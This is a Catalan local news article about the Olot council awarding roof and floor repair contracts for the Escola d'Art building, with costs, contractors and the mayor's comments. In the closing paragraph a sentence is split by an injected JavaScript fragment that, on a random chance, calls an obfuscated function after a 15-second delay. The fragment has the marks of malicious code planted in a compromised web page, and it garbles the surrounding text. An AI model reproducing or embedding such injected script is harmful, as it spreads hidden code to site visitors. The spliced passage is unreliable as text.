Aquest mes d’agost començaran les obres de millora de l’edifici de l’Escola d’Art d’Olot

Comparteix-ho amb els teus amics:

L’Ajuntament adjudica les obres d’arranjament de la coberta i dels paviments de les instal·lacions dels Claustres del Carme.

Escola Superior d’Art i Disseny d’Olot

La Junta de Govern Local d’aquest matí ha aprovat dues actuacions per a la millora de l’edifici del Carme, seu de l’Escola d’Art i Superior de Disseny d’Olot. D’acord amb la direcció del centre, s’ha decidit portar a terme una acció sobre la coberta de l‘edifici i una segona sobre el paviment de les instal·lacions.

La primera de les accions consistirà en el manteniment i la substitució de possibles teules trencades de la coberta de l’edifici, on també s’instal·larà una línia de vida (element de seguretat que consisteix en un cable fixat permanentment al teulat d’un edifici que permet que un operari s’hi pugui subjectar per a realitzar tasques de reparació i manteniment de la coberta). Els treballs s’han adjudicat a l’empresa Servicios Empresariales del Maresme per un import de 19.392’57 euros.

La segona operació permetrà millorar el paviment de les aules ja que, actualment, consta de diferents estats de conservació i característiques. D’acord amb la direcció de l’Escola, es determinaran els espais on s’actuarà per renovar i crear una unitat de materials en el terra de l’edifici. Les peces que es retirin es reservaran per a futures accions. L’empresa Puig Alder es farà càrrec els treballs per un import de 41.379’67 euros.

Després de la seva aprovació a la Junta de Govern Local, els treballs és previst que comencin aquest mes d’agost i que, per tant, estiguin a punt per a l’inici del nou curs al l‘Escola d’Art. L’Ajuntament d’Olot, que assumeix en la seva integritat els 60.772’24 euros de les obres, impulsa aquesta actuació com a primera fase d’un projecte que suposarà una millora gradual de la seu de l’Escola d’Art.

El Consistori treballa per trobar el finançament per a noves fases, que compten amb el compromís del Departament d’Ensenyament de la Generalitat per actuar sobre els Claustres del Carme. “Compromís absolut de l’Ajuntament perquè en els pressupostos de 2018 hi haurà una partida més gran que aquesta per continuar tirant endavant les millores” ha assegurat l’alcalde Josep M. Corominas que ha anunciat que “per l’any que ve tenim el compromís del Departament d’Ensenyament que també hi haurà una inversió important. Probablement assumiran més qüestions de seguretat, com el sistema elèctric, i nosaltres continuarem renovant paviments, actualitzant serveis i fins i tot en un algun moment determinat haurem de plantejar-nos canviar els tancaments de l’escola”.

D’altra bandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}anda, en el ple de l’Ajuntament d’Olot d’aquest vespre es porta a aprovació l’adjudicació de les obres de remodelació del Firal. La proposa que es porta al plenari preveu la contractació de l’empresa Rubau Tarrés per un import de 3.445.705,04 euros. Un altre dels punts del plenari serà l’aprovació del dret de servitud de pas per connectar els aparcaments soterrats de la zona del Firal (el de l’Illa del Teatre amb el Pàrquing Centre) perquè l’espai superior passi a ser d’ús per a vianants.

Info: Ajunt. Olot

Comparteix-ho amb els teus amics: